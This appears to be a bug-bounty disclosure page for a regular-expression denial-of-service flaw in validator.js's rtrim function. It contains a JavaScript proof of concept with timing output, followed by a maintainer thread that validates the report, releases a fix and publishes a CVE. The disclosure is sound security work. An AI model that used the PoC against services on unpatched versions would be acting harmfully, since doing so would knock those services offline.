Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 21st 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows cause a denial of service when calling function 'rtrim'.

The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'a'+' '.repeat(i*10000)+"a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"

Reference

I have opened an issue before, but it is still not safe after fix.

For repair, you can refer to the rtrim function in package trim

Occurrences

We have contacted a member of the validatorjs/validator.js team and are waiting to hear back 10 months ago
Sarhan Aissi
9 months ago

Thank you Yeting Li for reporting again a vulnerability in our package. Let me investigate the issue and get back to you asap

Sarhan Aissi validated this vulnerability 9 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
9 months ago

A PR containing a fix has been created. We will probably make a new release in the next few days including this fix. Thanks again Yeting Li for spotting the ReDoS!

Jamie Slome
9 months ago

Admin


Awesome!

Once the fix has been merged, feel free to confirm the fix on the report, and we can go ahead and publish a CVE 👏

Sarhan Aissi confirmed that a fix has been merged on 496fc8 8 months ago
The fix bounty has been dropped
rtrim.js#L6 has been validated
Sarhan Aissi
8 months ago

Thank you guys! We finally released the fix in validator 13.7.0. We will probably add a security advisory when the CVE is published

Jamie Slome
8 months ago

Admin


CVE published! 🎊

Sarhan Aissi
8 months ago

Advisory published https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6 🎉

Yeting Li
8 months ago

Researcher


Hi Sarhan and Jamie, thanks a lot!

to join this conversation